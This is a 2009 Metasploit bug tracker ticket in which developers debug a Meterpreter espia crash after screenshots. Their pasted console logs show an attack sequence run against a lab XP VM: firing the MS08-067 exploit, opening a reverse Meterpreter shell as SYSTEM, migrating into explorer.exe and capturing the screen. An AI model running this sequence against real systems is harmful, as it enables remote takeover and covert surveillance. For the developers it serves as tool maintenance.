Bug #422
Meterpreter espia extension, connection dies after successful screenshot
| Status: | Closed | Start date: | 10/26/2009 |
|---|---|---|---|
| Priority: | Normal | Due date: | |
| Assignee: | Efrain Torres | % Done: | 0% |
| Category: | meterpreter - win32 | | |
| Target version: | Metasploit 3.3 | | |
| Resolution: | worksforme | Release Note: | |
Description
Reported by CG. Exploited XP SP3 using MS08-067, migrated to explorer.exe, screenshot then crash after download.
History
Updated by HD Moore over 2 years ago
- Category set to meterpreter - win32
Updated by HD Moore over 2 years ago
This doesn't reproduce for me:
meterpreter > screenshot /tmp/x.bmp
[*] Image saved to /tmp/x.bmp
Opening browser to image...
meterpreter > ps
Process list
============
PID Name Path
--- ---- ----
364 smss.exe \SystemRoot\System32\sm
Updated by Chris Gates over 2 years ago
Did you migrate from SYSTEM? Tested again on XP SP1 VM, same thing.
meterpreter > screenshot /tmp/blah2.bmp
[*] Image saved to /tmp/blah2.bmp
Opening browser to image...
meterpreter > ls
[-] Operation timed out.
Updated by HD Moore over 2 years ago
Tried from system, no problems:
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.220
RHOST => 192.168.0.220
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (719360 bytes)
getuid[*] Meterpreter session 1 opened (192.168.0.136:4444 -> 192.168.0.220:1038)
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > ps
Process list
============
PID Name Path
--- ---- ----
268 cmd.exe C:\WINDOWS\system32\cmd.exe
360 smss.exe \SystemRoot\System32\smss.exe
500 alg.exe C:\WINDOWS\System32\alg.exe
544 wmiprvse.exe C:\WINDOWS\System32\wbem\wmiprvse.exe
684 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
708 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
752 services.exe C:\WINDOWS\system32\services.exe
764 lsass.exe C:\WINDOWS\system32\lsass.exe
920 svchost.exe C:\WINDOWS\system32\svchost.exe
1020 svchost.exe C:\WINDOWS\system32\svchost.exe
1112 svchost.exe C:\WINDOWS\System32\svchost.exe
1160 svchost.exe C:\WINDOWS\System32\svchost.exe
1280 svchost.exe C:\WINDOWS\System32\svchost.exe
1312 Explorer.EXE C:\WINDOWS\Explorer.EXE
1456 spoolsv.exe C:\WINDOWS\system32\spoolsv.exe
1520 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe
1528 VMwareUser.exe C:\Program Files\VMware\VMware Tools\VMwareUser.exe
1536 msmsgs.exe C:\Program Files\Messenger\msmsgs.exe
1580 wscntfy.exe C:\WINDOWS\system32\wscntfy.exe
1696 rundll32.exe C:\WINDOWS\system32\rundll32.exe
1720 VMwareService.exe C:\Program Files\VMware\VMware Tools\VMwareService.exe
meterpreter > migrate 1312
[*] Migrating to 1312...
[*] Migration completed successfully.
meterpreter > use espia
Loading extension espia...success.
meterpreter > screenshot /tmp/boom.bmp
[*] Image saved to /tmp/boom.bmp
Opening browser to image...
meterpreter > getuid
Server username: XPDEV\Developer
meterpreter > sysinfo
Computer: XPDEV
OS : Windows XP (Build 2600, Service Pack 3).
Arch : x86
Language: en_US
meterpreter >
Updated by Chris Gates over 2 years ago
Well, a couple of issues with VMs does not a bug make. If no one else can reproduce, I suppose we can close the ticket for the time being.
Updated by HD Moore over 2 years ago
- Status changed from New to Closed
- Resolution set to worksforme
OK, we can reopen if it starts showing up elsewhere.